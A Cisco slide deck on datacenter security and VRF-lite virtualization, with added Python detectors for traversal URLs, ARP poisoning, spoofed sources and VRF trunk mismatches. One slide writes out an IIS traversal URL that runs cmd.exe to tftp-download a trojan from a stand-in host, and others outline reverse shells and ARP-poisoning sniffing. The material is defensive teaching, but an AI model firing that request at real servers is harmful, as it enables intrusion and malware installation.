Datacenter Security & Virtualized Architecture

Franck Bonneau, TSE, Data Center
fbonneau@cisco.com

© 2006 Cisco Systems, Inc. All rights reserved.
Cisco Confidential

Agenda

- Datacenter Security Threats
- Datacenter Design Overview
- Datacenter Virtualization
- Cisco IP services in virtualized architecture: examples
  - Virtualized central firewall deployment example
  - How the ACE load balancer helps to secure the server farm
    - HTTP inspection in action: HTTP tunneling
    - HTTP inspection in action: URL canonicalization

Data Center Security
Protecting the Enterprise Data

- Who to protect applications from?
  - External threats from the Internet
  - Internal threats from the Intranet
  - Attacks originating from partners' networks
- What to protect applications from?
  - Intrusion
  - Denial of service
  - Worms
- Prevent the servers from becoming the source of attacks against a third-party entity

Typical Intrusion Sequence
Phase 1: Hacking the Web/Application Server
(Diagram: HTTP from the Internet into a Layer 2 segment of web servers; the web/application tier and the database tier sit on separate Layer 2 segments.)

- After a phase of probing/scanning, the hacker detects the vulnerability of the web/application server
- The hacker exploits the vulnerability to get a shell
- For example, copy the trojan onto the web/application server:
  HTTPS://www.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe
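The request above works because the server checks the path before it canonicalizes it: `%c0%af` is an overlong UTF-8 encoding of "/" that the IIS decoder of the time accepted (the MS00-078 "Web Server Folder Traversal" bug), so `..%c0%af..` becomes `../..` only after the access check has passed. The Python below is an added example, not code from the Cisco deck: it canonicalizes the request path twice, once with a strict RFC 3629 decoder and once with a decoder modelled on the lenient IIS behaviour, and reports whether the result climbs above the web root. The sample request is the one from the slide; the lenient decoder is a model of the bug, not IIS source, and the depth rule (web root = "/") is an assumption of the example.

```python
"""Added example (not from the Cisco deck): detect directory traversal the way
the target server will canonicalize the path, not the way a strict decoder does.
"""
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed sample: the Phase 1 request shown on the slide above.
SAMPLE_REQUEST = (
    "https://www.example.com/scripts/..%c0%af../winnt/system32/cmd.exe"
    "?/c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe"
)


def decode_bytes(raw: bytes, lenient: bool) -> str:
    """Turn percent-decoded bytes into text.

    lenient=False: strict RFC 3629 UTF-8; overlong forms such as C0 AF are
    invalid and become U+FFFD, so '..%c0%af..' is NOT seen as '../..'.
    lenient=True: models the pre-MS00-078 IIS decoder, which accepted 2-byte
    overlong encodings of ASCII (lead byte C0/C1) and mapped C0 AF to '/'.
    Other bytes >= 0x80 are replaced; only ASCII matters for traversal.
    """
    if not lenient:
        return raw.decode("utf-8", errors="replace")
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))  # overlong ASCII
            i += 2
        else:
            out.append(chr(b) if b < 0x80 else "\ufffd")
            i += 1
    return "".join(out)


def canonical_path(url: str, lenient: bool, max_rounds: int = 3) -> str:
    """Path component, percent-decoded until stable (defeats double encoding
    such as %252e), with backslashes folded to '/' as Windows servers do."""
    path = urlsplit(url).path
    for _ in range(max_rounds):
        decoded = decode_bytes(unquote_to_bytes(path), lenient)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def escapes_webroot(url: str, lenient: bool = True) -> bool:
    """True if the canonical path climbs above the web root, i.e. a '..'
    segment appears when no directory is left to climb out of."""
    depth = 0
    for segment in canonical_path(url, lenient).split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


if __name__ == "__main__":
    print("strict decoder flags traversal:   ", escapes_webroot(SAMPLE_REQUEST, lenient=False))
    print("IIS-style decoder flags traversal:", escapes_webroot(SAMPLE_REQUEST, lenient=True))
```

The strict decoder never sees a traversal in the slide's request, which is exactly why a signature or WAF that decodes "correctly" misses it; the check has to reproduce the decoder of the server it protects. The same loop catches `%252e%252e` double encoding and `%5c` backslashes.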

Typical Intrusion Sequence
Phase 1: Obtaining a Reverse Shell
(Diagram: the hacker's PC holding a reverse shell from the web server.)

- By using various tools and exploits the hacker eventually obtains the web server shell
- From this shell the hacker effectively controls the web server, which gives him access to the other servers in the data center
- Once the hacker has a shell on the web server he can follow two strategies to access confidential data:
  1. Hack the database
  2. Sniff the traffic

Typical Intrusion Sequence
Phase 2, Strategy 1: Accessing the Database
(Diagram: the same web/application and database Layer 2 segments as above.)

- The hacker looks for the database server; if the web/application servers are Layer 2 adjacent to it (with dual NICs, for example), this is extremely easy
- Use a command line scanner
- Identify the vulnerabilities of the DB server
- Then obtain a shell on the database server and dump the database information

Typical Intrusion Sequence
Phase 2, Strategy 2: Sniffing the Traffic
(Diagram: subnet 192.168.10.0/24 with the data center default gateway at .1 and Server A (.5), Server B (.4), Server C (.3) and Server D (.2). On the normal traffic path the servers talk through the gateway; with ARP poisoning, the trojaned server answers "I'm .1", so user passwords and credit card information are routed through it.)
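The poisoning on this slide is detectable at the switch with Dynamic ARP Inspection (DAI), which drops ARP replies that do not match the DHCP snooping or static binding table, and passively by watching for one MAC that claims the gateway address on top of its own. The Python below is an added example, not code from the Cisco deck or from a Cisco product: it applies both checks to a constructed set of ARP replies on the 192.168.10.0/24 subnet of the diagram. The MAC addresses, switch ports and timestamps are made up for the example.

```python
"""Added example (not from the Cisco deck): DAI-style validation of ARP replies
against a binding table, plus a passive heuristic for the gateway-spoofing
pattern on the slide. All MACs, ports and timestamps are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: int            # seconds, constructed
    sender_ip: str
    sender_mac: str
    ingress_port: str


# Constructed binding table (what DHCP snooping / static bindings give DAI):
# IP -> (MAC, switch port). Addresses follow the 192.168.10.0/24 diagram above.
BINDINGS = {
    "192.168.10.1": ("00:00:0c:07:ac:01", "Gi1/1"),   # default gateway .1
    "192.168.10.5": ("00:11:22:33:44:55", "Gi1/5"),   # Server A
    "192.168.10.4": ("00:11:22:33:44:44", "Gi1/4"),   # Server B
    "192.168.10.3": ("00:11:22:33:44:33", "Gi1/3"),   # Server C
    "192.168.10.2": ("00:11:22:33:44:22", "Gi1/2"),   # Server D
}

# Constructed ARP replies: the last two are the poisoning. Server A's MAC claims
# the gateway and Server D, so traffic between D and the gateway passes through A.
SAMPLE_REPLIES = [
    ArpReply(0, "192.168.10.1", "00:00:0c:07:ac:01", "Gi1/1"),
    ArpReply(1, "192.168.10.5", "00:11:22:33:44:55", "Gi1/5"),
    ArpReply(2, "192.168.10.2", "00:11:22:33:44:22", "Gi1/2"),
    ArpReply(3, "192.168.10.1", "00:11:22:33:44:55", "Gi1/5"),  # "I'm .1"
    ArpReply(4, "192.168.10.2", "00:11:22:33:44:55", "Gi1/5"),  # "I'm .2"
]


def dai_verdict(reply, bindings):
    """DAI logic: permit only if sender IP, MAC and ingress port match a binding."""
    bound = bindings.get(reply.sender_ip)
    if bound is None:
        return "drop", "no binding for sender IP"
    mac, port = bound
    if reply.sender_mac.lower() != mac:
        return "drop", f"sender MAC {reply.sender_mac} != bound {mac}"
    if reply.ingress_port != port:
        return "drop", f"arrived on {reply.ingress_port}, bound to {port}"
    return "permit", "matches binding"


def inspect(replies, bindings, gateway_ip="192.168.10.1"):
    """Per-reply DAI verdicts plus passive alerts that need no binding table:
    an IP whose MAC changes, and one MAC claiming the gateway as well as other
    hosts, which is the man-in-the-middle shape drawn on the slide."""
    verdicts, alerts = [], []
    last_mac = {}                      # IP -> last MAC seen claiming it
    claims = defaultdict(set)          # MAC -> set of IPs it has claimed
    for r in replies:
        verdicts.append(dai_verdict(r, bindings))
        mac = r.sender_mac.lower()
        if r.sender_ip in last_mac and last_mac[r.sender_ip] != mac:
            alerts.append(f"t={r.ts}: {r.sender_ip} moved from {last_mac[r.sender_ip]} to {mac}")
        last_mac[r.sender_ip] = mac
        claims[mac].add(r.sender_ip)
        if gateway_ip in claims[mac] and len(claims[mac]) > 1:
            others = sorted(claims[mac] - {gateway_ip})
            alerts.append(f"t={r.ts}: {mac} claims gateway {gateway_ip} and {others}: "
                          "likely ARP poisoning MITM")
    return verdicts, alerts


if __name__ == "__main__":
    verdicts, alerts = inspect(SAMPLE_REPLIES, BINDINGS)
    for r, (verdict, why) in zip(SAMPLE_REPLIES, verdicts):
        print(f"t={r.ts} {r.sender_ip} is-at {r.sender_mac} on {r.ingress_port}: {verdict} ({why})")
    print(*alerts, sep="\n")
```

With DAI enabled on the access switch the two poisoned replies never reach the other servers; the passive heuristic is what a sniffer or arpwatch-style monitor would raise where DAI is not deployed, and it fires on the first reply that claims the gateway from a MAC already known for another host.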

Denial of Service Attacks
DoS and DDoS

- DoS attacks are meant to deny access to authorized users and consume enterprise resources: bandwidth, CPU, memory blocks
- The hacker can utilize compromised PCs/servers that become zombies or bots to launch the attack (DDoS)
- The vulnerabilities most usually exploited by bots to spread are web servers (IIS and Apache), Windows RPC, SQL Server and MySQL, WINS, and the backdoors left open by the Bagle and Mydoom variants
(Diagram: bots flooding the web servers.)

Denial of Service Attacks
Source IP Spoofing (1)

Source IP spoofing is used to:
- Hide the source: so the attacker or resource is not revealed
- Bypass security: masquerading as valid packets. E.g. 10.20.5.0 can talk to 10.20.10.0, and by default direct access to 10.20.10.0 is denied; by spoofing the source IP (Src IP = 10.20.5.0) the hacker can attack the network 10.20.10.0
- Masquerade as the real target: turns the "victim" into an agent of the real attack
- Consume network resources: create translations/flows on load balancers or firewalls

Source IP Spoofing (2)
(Same four uses; diagram of a SYN reflector: the attacker at 192.0.2.150 sends SYNs with source 10.56.32.1 to the server farm broadcast address 192.168.2.255, and every server in 192.168.2.0/24 sends its reply (SYN/ACK) to the "victim" 10.56.32.1.)

Source IP Spoofing (3)
(Same four uses; diagram: potential victims in 10.20.10.0; the compromised host in 10.20.5.0 cycles multiple source IP addresses (IP1, IP2, IP3) to exhaust network resources, i.e. the translation/flow tables of load balancers and firewalls.)
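The three spoofing slides have one infrastructure answer, unicast RPF (uRPF) on ingress, listed later under "Layer 2 security": a packet whose source address has no route back out the interface it arrived on is dropped, and the reflector on slide (2) additionally needs a router willing to forward to a subnet broadcast address. The Python below is an added example, not code from the Cisco deck or from IOS: it implements the strict and loose uRPF decision over a toy FIB built from the addresses on the slides, plus the directed-broadcast drop, and runs the slide scenarios through it. The interface names, the partner-link prefix 10.56.32.0/24 and the default route are assumptions of the example.

```python
"""Added example (not from the Cisco deck): ingress anti-spoofing checks in the
style of unicast RPF (strict and loose) over a toy FIB, plus the directed-
broadcast drop that defuses the SYN reflector. FIB and packets are constructed.
"""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Route:
    prefix: ipaddress.IPv4Network
    out_iface: str


def fib(*entries):
    return [Route(ipaddress.ip_network(p), iface) for p, iface in entries]


# Constructed FIB of a border/aggregation router: internal subnets from the
# slides, the server farm, a hypothetical partner link, and a default to the Internet.
FIB = fib(
    ("10.20.5.0/24", "Vlan5"),      # source network on slide (1)
    ("10.20.10.0/24", "Vlan10"),    # protected network on slide (1)
    ("192.168.2.0/24", "Vlan2"),    # server farm on slide (2)
    ("10.56.32.0/24", "Gi0/1"),     # partner link where the reflection "victim" lives (assumed)
    ("0.0.0.0/0", "Gi0/0"),         # Internet
)


def lookup(fib_entries, addr):
    """Longest-prefix match; None if nothing covers addr."""
    best = None
    for r in fib_entries:
        if addr in r.prefix and (best is None or r.prefix.prefixlen > best.prefix.prefixlen):
            best = r
    return best


def urpf(fib_entries, src, ingress, mode="strict", allow_default=False):
    """Unicast RPF as IOS applies it: a route back to the source must exist
    (loose) and, in strict mode, must point out the ingress interface. The
    default route does not count unless allow-default is set."""
    route = lookup(fib_entries, ipaddress.ip_address(src))
    if route is None or (route.prefix.prefixlen == 0 and not allow_default):
        return False
    return True if mode == "loose" else route.out_iface == ingress


def is_directed_broadcast(fib_entries, dst):
    """True if dst is the broadcast address of a known subnet: the amplifier a
    SYN reflector relies on, blocked by 'no ip directed-broadcast'."""
    addr = ipaddress.ip_address(dst)
    route = lookup(fib_entries, addr)
    return (route is not None and route.prefix.prefixlen not in (0, 31, 32)
            and addr == route.prefix.broadcast_address)


def ingress_filter(fib_entries, src, dst, ingress, mode="strict", allow_default=False):
    """Verdict for one packet: the rule that drops it, or 'forward'."""
    if not urpf(fib_entries, src, ingress, mode, allow_default):
        return f"drop: uRPF {mode} fails for {src} on {ingress}"
    if is_directed_broadcast(fib_entries, dst):
        return f"drop: directed broadcast to {dst}"
    return "forward"


if __name__ == "__main__":
    # (src, dst, ingress, allow_default): constructed packets for the slide scenarios
    cases = [
        ("10.20.5.7", "10.20.10.9", "Vlan5", False),       # legitimate internal host
        ("10.20.5.7", "10.20.10.9", "Gi0/0", True),        # Internet host spoofing 10.20.5.0 (slide 1)
        ("10.56.32.1", "192.168.2.255", "Gi0/0", True),    # 192.0.2.150 spoofing the victim (slide 2)
        ("10.56.32.1", "192.168.2.255", "Gi0/1", False),   # not spoofed, still a broadcast amplifier
        ("198.51.100.4", "192.168.2.10", "Gi0/0", True),   # ordinary Internet client
    ]
    for src, dst, ingress, allow_default in cases:
        print(f"{src:>13} -> {dst:<14} in {ingress}: "
              f"{ingress_filter(FIB, src, dst, ingress, allow_default=allow_default)}")
```

Two caveats the slides leave implicit: strict uRPF on the Internet-facing interface drops every packet when the only matching route is the default, so that interface needs `allow-default` (or loose mode, which then no longer catches spoofed internal sources); and strict mode only works where routing is symmetric, which holds on the access VLANs here but not on multihomed links.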

Worms
Effects on Servers and Network

Effect on the servers:
- High CPU (thread creation, scanning)
- Applications impacted
Effect on the network infrastructure:
- Random scanning for vulnerable hosts, including the router processors
- Increased traffic: network links overloaded
(Diagram: data center system under attack, with an infected source at the access layer scanning through the aggregation and core layers.)

What are the solutions?

- First, harden the datacenter infrastructure
  - Layer 2 security (ACL, DAI, uRPF, DHCP Snooping, PVLAN, Port Security, IP Source Guard, ...)
  - Protect the control plane (CoPP, Control Plane Policing)
  - ...
- Protect the datacenter against DoS & DDoS
  - Detection with NetFlow / syslogs / CS-MARS
  - Remotely Triggered Black Hole (source based, destination based)
  - Denial of service mitigation with firewalls, load balancers and switches/routers: access control lists, rate limiting/policing
  - DoS and DDoS mitigation with the Cisco Guard
  - Data center design for DoS and DDoS protection
- Datacenter segmentation
  - Use virtualization technologies
  - Control traffic between "VPNs" using FW, IPS, Web FW


Data Center Switching
Data Center Layout
Data centers typically comprise three functional layers (core, aggregation, access)...

Data Center Design
Core Design Considerations

- Use EtherChannel to increase resiliency, using the L4 option in the hash
- Layer 2 extension to the core is not recommended
- Prefer Layer 3 on all interfaces
- Use IGP authentication to secure adjacencies
- Summarize aggregation routes to the core

A Catalyst 6500 deployed in the core supports the following key technologies:
- 10GE port density
- Distributed forwarding
- ECMP
- IP multicast
- Low latency switching
- Multiple IGP support (OSPF / EIGRP / IS-IS)
- HSRP / VRRP and GLBP
- VRF-Lite

Distribution/Aggregation Layer

A Catalyst 6500 deployed in the aggregation layer supports the following key technologies:
- 10GE density
- Spanning Tree and Spanning Tree extensions
- HSRP / VRRP and GLBP
- Integrated services
- VRF
- EtherChannel
- ECMP

Layer 2 Distribution
STP Model
(Diagram: two distribution switches joined by a Layer 2 trunk; one is HSRP active and STP root for VLANs 20 and 140, the other for VLANs 40 and 120. Access switches carry VLAN 20 data (10.1.20.0) and VLAN 120 voice (10.1.120.0), VLAN 40 data (10.1.40.0) and VLAN 140 voice (10.1.140.0); the redundant access-layer uplink is blocked by STP.)

- Use only if Layer 2 VLAN spanning flexibility is required
- STP convergence required for uplink failure/recovery
- More complex, as STP root and HSRP active should match
- Distribution-to-distribution link required for route summarization

Layer 3 Distribution
HSRP/GLBP Model
(Diagram: same VLANs and subnets, but the distribution-to-distribution link is Layer 3; no spanning tree, all links active. One switch is HSRP active for VLANs 20 and 140, the other for VLANs 40 and 120.)

- Recommended "best practice": tried and true
- Fully utilize uplinks via GLBP
- No STP convergence required for uplink failure/recovery
- Distribution-to-distribution link required for route summarization
- Map the L2 VLAN number to the L3 subnet for ease of use/management

Routing to the Edge
Layer 3 Distribution with Layer 3 Access
(Diagram: EIGRP/OSPF runs between core, distribution and access switches; the access switch is the GLBP gateway for VLAN 20 data (10.1.20.0), VLAN 120 voice (10.1.120.0), VLAN 40 data (10.1.40.0) and VLAN 140 voice (10.1.140.0); Layer 2 remains only on the access ports.)

- Move the Layer 2/3 demarcation to the network edge
- Upstream convergence is triggered by hardware detection of loss of light from the upstream neighbor
- Beneficial for the right environment

Routing to the Edge
Advantages, Yes in the Right Environment

- Ease of implementation, less to get right
  - No matching of STP/HSRP/GLBP priority
  - No L2/L3 multicast topology inconsistencies
- Single control plane and well known tool set: traceroute, show ip route, show ip eigrp neighbor, etc.
- Most Catalysts support L3 switching today
- EIGRP converges in < 200 msec
- OSPF with sub-second tuning converges in < 200 msec
- RPVST+ convergence times are dependent on GLBP/HSRP tuning

Both L2 and L3 can provide sub-second convergence
(Chart: upstream and downstream convergence time in seconds, scale 0 to 1.8, for RPVST+, OSPF 12.2S and EIGRP.)

Increasing HA in the Data Center
Failover: What is the Time to Beat?

- The overall failover time is the combination of convergence at the L2, L3 and L4 components
  - Stateful devices can replicate connection information and typically fail over within 3-5 sec
  - EtherChannels: < 1 sec
  - STP converges in ~1 sec (802.1w); HSRP can be tuned to < 1 s
- Where does TCP break? Linux, AIX, Microsoft, etc.
(Chart: failover time made up of L2 convergence, L3 convergence and L4 convergence (~5 s), against the TCP stack tolerance: Microsoft 2003 Server / XP tolerate ~9 s; Linux and others tolerate a lot longer.)

Increasing HA in the Data Center
Failover Time Comparison

- STP (802.1w): ~1 sec
- OSPF / EIGRP: sub-second
- ACE module with autostate: ~1 sec
- HSRP: ~3 sec (1 s hello / 3 s hold timers; may be tuned to less)
- FWSM module: ~3 sec
- CSM module: ~5 sec
- Windows XP / 2003 Server TCP stack tolerance: ~9 sec

Global L3 Architecture
Where to install IP services (FW, IPS, ...)?
(Diagram: Internet, Layer 3 core, distribution and access layers, with a question mark at each possible insertion point.)

- Modular, hierarchical
- Scalable, yet not virtualized


Problem Definition: Drivers

- Closed user group creation
  - Private, secure & independent over a shared infrastructure
  - Transparency
  - Enable user mobility
  - Productivity gains
- Centralization of policies and services
  - Policies based on groups
  - Simplified deployment
  - Enhanced manageability
  - Lower operational costs
- Sharing of network intelligence/services
  - Costly resources centrally serve all groups while maintaining privacy
  - e.g. data center FW, IPS, proxy, web FW, ...

... with Centralized Services & Policies

- Services not duplicated per group
- Economical
- Efficient and manageable
- Policies centrally deployed
(Diagram: a DC core connects Employees, Partners (Partner 10.2/16) and Contractors (Contractor 10.2/16, Contractor 10.3/16) to resources shared by all groups: Internet gateway, video server, firewall and NAT, hosted content, DHCP, IPsec gateway, and the Internet / shared resource 10.2/16. Note the overlapping 10.2/16 address space between groups.)

Current Datacenter Design Recommendation
(Diagram: Internet, Layer 3 core, L2/L3 distribution, L2/L3 access.)

- Modular, hierarchical
- Scalable, yet not virtualized

A Virtual Network per Group
(Diagram: access, distribution and core layers each carrying one virtual network per group.)

Virtualization Alternatives

Datacenter VPN Options

- Segmentation at Layer 2: VLANs
- Segmentation at Layer 3: ACLs or GRE
- Datacenter L3 VPN
  - MPLS L3 VPNs
  - VRF-lite
  - VLANs mapped to VPNs to "extend" VPNs over L2 domains and between VRF-lite routers
- Datacenter VPN = L2 VLAN + L3 VPN = end-to-end

Datacenter VPN: VRF-Lite
(Diagram: VRF VPN1 holds VLANs 100 and 101, VRF VPN2 holds VLANs 200 and 201, VRF VPN-SERVERS holds VLANs 301, 302, 303 and 304.)

VRF-lite
(Diagram: one physical switch hosting several VRFs, each a virtual router with its own IP switching; 802.1q trunks carry the VLANs, and each VRF attaches to them through an SVI or a sub-interface (Layer 3).)

VRF-Lite
Router-to-Router Interaction
(Diagram: switches SW1 and SW2, each with PE-VRF and CE-VRF instances, connected by 802.1q trunks; each VRF terminates on an SVI or sub-interface (Layer 3). Toward the access layer, VRFs map to VLANs. VRFs peer over separate routing instances.)

Using VRF-Lite End-to-End: Example

- L2 access
- Using VRF-lite only: VRF-lite at core and distribution
- Routed sub-interfaces between switches
  - No BGP or MPLS
  - MPLS labels substituted by 802.1q tags end-to-end
  - Every link is an 802.1q trunk
  - One sub-interface per VRF
- Restricted scalability

802.1q Tags End-to-End, Trunk with Switchport
1. VRF definitions: route distinguisher and route target (Cat 4500 and Cat 6500)

ip vrf VPN1
 rd 1:1
 route-target export 1:1
!
ip vrf VPN2
 rd 2:2
 route-target export 2:2
!
ip vrf VPN-SERVERS
 rd 3:3
 route-target export 3:3
!

802.1q Tags End-to-End, Trunk with Switchport
2a. Links between routers defined as a L2 trunk with switchports (VLANs 2000-2003 between Cat 4500 and Cat 6500)

Cat4500:
interface GigabitEthernet1/1
 description ----- To Cat6500-1 -----
 switchport trunk encapsulation dot1q
 switchport trunk allowed vlan 2000-2003
 switchport mode trunk
 spanning-tree portfast trunk
!
interface Vlan2000
 description ----- Link to Cat6500-1
 ip address 10.149.12.2 255.255.255.0
 ip ospf network point-to-point
!
interface Vlan2001
 ip vrf forwarding VPN1
 ip address 1.1.12.2 255.255.255.0
 ip ospf network point-to-point
!
interface Vlan2002
 ip vrf forwarding VPN2
 ip address 2.2.12.2 255.255.255.0
 ip ospf network point-to-point
!
interface Vlan2003
 ip vrf forwarding VPN-SERVERS
 ip address 3.3.12.2 255.255.255.0
 ip ospf network point-to-point
!

802.1q Tags End-to-End, Trunk with Switchport
2b. Or links between routers defined as a L3 trunk with sub-interfaces (VLANs 2000-2003 between Cat 4500 and Cat 6500)

Cat6500:
interface GigabitEthernet6/1
 no ip address
!
interface GigabitEthernet6/1.2000
 encapsulation dot1Q 2000
 ip address 10.149.12.1 255.255.255.0
 ip ospf network point-to-point
!
interface GigabitEthernet6/1.2001
 encapsulation dot1Q 2001
 ip vrf forwarding VPN1
 ip address 1.1.12.1 255.255.255.0
 ip ospf network point-to-point
!
interface GigabitEthernet6/1.2002
 encapsulation dot1Q 2002
 ip vrf forwarding VPN2
 ip address 2.2.12.1 255.255.255.0
 ip ospf network point-to-point
!
interface GigabitEthernet6/1.2003
 encapsulation dot1Q 2003
 ip vrf forwarding VPN-SERVERS
 ip address 3.3.12.1 255.255.255.0
 ip ospf network point-to-point
!

802.1q Tags End-to-End, Trunk with Switchport
3. VLANs: move the VLANs into their respective VRF (Cat 4500 and Cat 6500)

Cat4500:
interface Vlan110
 ip vrf forwarding VPN1
 ip address 10.1.1.2 255.255.255.0
!
interface Vlan120
 ip vrf forwarding VPN2
 ip address 20.1.1.2 255.255.255.0
!

Cat6500:
interface Vlan110
 ip vrf forwarding VPN1
 ip address 10.1.1.1 255.255.255.0
!
interface Vlan120
 ip vrf forwarding VPN2
 ip address 20.1.1.1 255.255.255.0
!

802.1q Tags End-to-End, Trunk with Switchport
4. Routing processes: then run separate OSPF processes per VRF (Cat 4500 and Cat 6500)

router ospf 1 vrf VPN1
 network 1.0.0.0 0.255.255.255 area 0
 network 10.0.0.0 0.255.255.255 area 0
!
router ospf 2 vrf VPN2
 network 2.0.0.0 0.255.255.255 area 0
 network 20.0.0.0 0.255.255.255 area 0
!
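Steps 1 to 4 make the 802.1q tag the only thing that keeps VPN1, VPN2 and VPN-SERVERS apart on the trunk: there is no MPLS label or BGP route target to catch a mistake, so if tag 2002 is placed in VPN2 on one switch and in VPN-SERVERS on the other, the two VPNs are spliced together at Layer 3 without any error. The Python below is an added example, not code from the Cisco deck: it parses the SVI and sub-interface styles of steps 2a and 2b from both ends of the trunk, checks that every `ip vrf forwarding` names a defined VRF, and that both ends agree on VRF and subnet per tag. The configs are constructed after the slides (OSPF and description lines dropped), and the Cat 6500 copy named CAT6500_BAD carries a deliberate mismatch on tag 2002 to show the detection.

```python
"""Added example (not from the Cisco deck): check that both ends of a VRF-lite
802.1q trunk agree on tag -> VRF -> subnet. Configs are constructed after the
slides; CAT6500_BAD contains a deliberate cross-VPN mistake on tag 2002.
"""
import ipaddress
import re
from textwrap import dedent

CAT4500_SVI = dedent("""\
    ip vrf VPN1
     rd 1:1
    ip vrf VPN2
     rd 2:2
    ip vrf VPN-SERVERS
     rd 3:3
    interface Vlan2000
     ip address 10.149.12.2 255.255.255.0
    interface Vlan2001
     ip vrf forwarding VPN1
     ip address 1.1.12.2 255.255.255.0
    interface Vlan2002
     ip vrf forwarding VPN2
     ip address 2.2.12.2 255.255.255.0
    interface Vlan2003
     ip vrf forwarding VPN-SERVERS
     ip address 3.3.12.2 255.255.255.0
    """)

CAT6500_SUBIF = dedent("""\
    ip vrf VPN1
     rd 1:1
    ip vrf VPN2
     rd 2:2
    ip vrf VPN-SERVERS
     rd 3:3
    interface GigabitEthernet6/1.2000
     encapsulation dot1Q 2000
     ip address 10.149.12.1 255.255.255.0
    interface GigabitEthernet6/1.2001
     encapsulation dot1Q 2001
     ip vrf forwarding VPN1
     ip address 1.1.12.1 255.255.255.0
    interface GigabitEthernet6/1.2002
     encapsulation dot1Q 2002
     ip vrf forwarding VPN2
     ip address 2.2.12.1 255.255.255.0
    interface GigabitEthernet6/1.2003
     encapsulation dot1Q 2003
     ip vrf forwarding VPN-SERVERS
     ip address 3.3.12.1 255.255.255.0
    """)

# Deliberate misconfiguration (constructed): tag 2002 lands in VPN-SERVERS on the 6500.
CAT6500_BAD = CAT6500_SUBIF.replace(
    "dot1Q 2002\n ip vrf forwarding VPN2", "dot1Q 2002\n ip vrf forwarding VPN-SERVERS")


def parse_ios(config):
    """Return (defined VRF names, {tag: {iface, vrf, net}}) from an IOS snippet.
    The tag comes from 'encapsulation dot1Q N' or from an SVI name 'VlanN'."""
    vrfs, interfaces, cur = set(), [], None
    for raw in config.splitlines():
        line = raw.rstrip()
        if (m := re.match(r"ip vrf (\S+)$", line)):
            vrfs.add(m.group(1))
            cur = None
        elif (m := re.match(r"interface (\S+)", line)):
            cur = {"iface": m.group(1), "vrf": None, "net": None, "tag": None}
            if (sv := re.fullmatch(r"Vlan(\d+)", m.group(1))):
                cur["tag"] = int(sv.group(1))
            interfaces.append(cur)
        elif cur is not None and line.startswith(" "):
            s = line.strip()
            if (m := re.match(r"encapsulation dot1[qQ] (\d+)", s)):
                cur["tag"] = int(m.group(1))
            elif (m := re.match(r"ip vrf forwarding (\S+)", s)):
                cur["vrf"] = m.group(1)
            elif (m := re.match(r"ip address (\S+) (\S+)", s)):
                cur["net"] = ipaddress.ip_interface(f"{m.group(1)}/{m.group(2)}").network
    return vrfs, {i["tag"]: i for i in interfaces if i["tag"] is not None}


def check_trunk(config_a, config_b):
    """List every way the two trunk ends disagree; an empty list means consistent."""
    problems = []
    sides = {"A": parse_ios(config_a), "B": parse_ios(config_b)}
    for name, (vrfs, links) in sides.items():
        for tag, l in links.items():
            if l["vrf"] and l["vrf"] not in vrfs:
                problems.append(f"{name}: tag {tag} ({l['iface']}) references undefined VRF {l['vrf']}")
    links_a, links_b = sides["A"][1], sides["B"][1]
    for tag in sorted(set(links_a) | set(links_b)):
        a, b = links_a.get(tag), links_b.get(tag)
        if a is None or b is None:
            problems.append(f"tag {tag} configured on only one end")
        elif a["vrf"] != b["vrf"]:
            problems.append(f"tag {tag}: VRF {a['vrf']} on A but {b['vrf']} on B (cross-VPN leak)")
        elif a["net"] != b["net"]:
            problems.append(f"tag {tag}: subnet {a['net']} on A but {b['net']} on B")
    return problems


if __name__ == "__main__":
    print("good pair:", check_trunk(CAT4500_SVI, CAT6500_SUBIF) or "consistent")
    print("bad pair: ", check_trunk(CAT4500_SVI, CAT6500_BAD))
```

An interface with no `ip vrf forwarding` (tag 2000 here) is the global table on both ends, which the check treats as one more VRF that must match; a tag present on only one side is reported too, since the other end's traffic for it would be dropped or, worse, land in the native VLAN.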

Inter-VRF Communication
Two basic models:

1. Controlled by firewalls / ACLs
   - Provides protected access to shared services
   - Provides protected communication between VRFs
   - Is equivalent to interconnecting separate IP networks
   - Routing between networks occurs at specific gateway points
2. Route leaking between VRFs using a BGP process
   - Provides unprotected communication between VRFs
   - Allows extranet creation for shared services
   - Populates routing tables to enable reachability between VPNs
   - Routing between networks is optimal
   - No inter-VPN policy enforcement possible


Firewall Services Module
Cisco's Highest Performance Firewall

- Transparent (L2) and routed (L3) firewalls in the same service module
- Resource manager: assign service classes, resource limits
- 256 VLANs per context, with a maximum of 2000 VLANs
- LAN failover active/standby and active/active (both intra- and inter-chassis)
- Dynamic routing: OSPF and RIP (2 OSPF virtual routers), single-context mode only. Stub BGP in 3.2, even in multiple-context mode.
- Supports multiple blades in the chassis, up to 4 for 20 Gbps
- Supported on Native IOS 12.1(13E) and CatOS 7.5(1) onwards
- 250 virtual firewalls / contexts

Performance:
- High performance firewall: 5.5 Gbps bandwidth
- 2.85 million pps throughput
- 100K new connections/sec for HTTP, DNS and enhanced SMTP
- 1 million concurrent connections
- 80K access-list entries enforced in hardware
- Jumbo-ready (9022 bytes)

Virtual Firewall Overview

- Context hierarchy:
  - System execution space (i.e. "session slot 6"), the root context (mandatory)
  - Admin context (mandatory): remote root access
  - Security contexts A, B, C; managed over ssh, telnet, ipsec, https
- There is no policy inheritance between contexts
- The system space uses the admin context for network connectivity; the system space creates the other contexts

Each VFW Can Be Routed or Transparent

Routed mode:
(Diagram: Catalyst 6500 with the FWSM in slot 5; client on Fa8/1 in VLAN 30, 10.30.1.0/24, with the FWSM outside interface at 10.30.1.1; WEB server on Fa8/2 in VLAN 60, 10.60.1.0/24, with the FWSM inside interface at 10.60.1.1.)

Transparent mode:
(Diagram: Catalyst 6500 with the FWSM in slot 5; client on Fa8/1 in VLAN 30 (outside) and WEB server on Fa8/2 in VLAN 31 (inside), both in the same subnet 10.30.1.0/24; the FWSM bridges the two VLANs.)

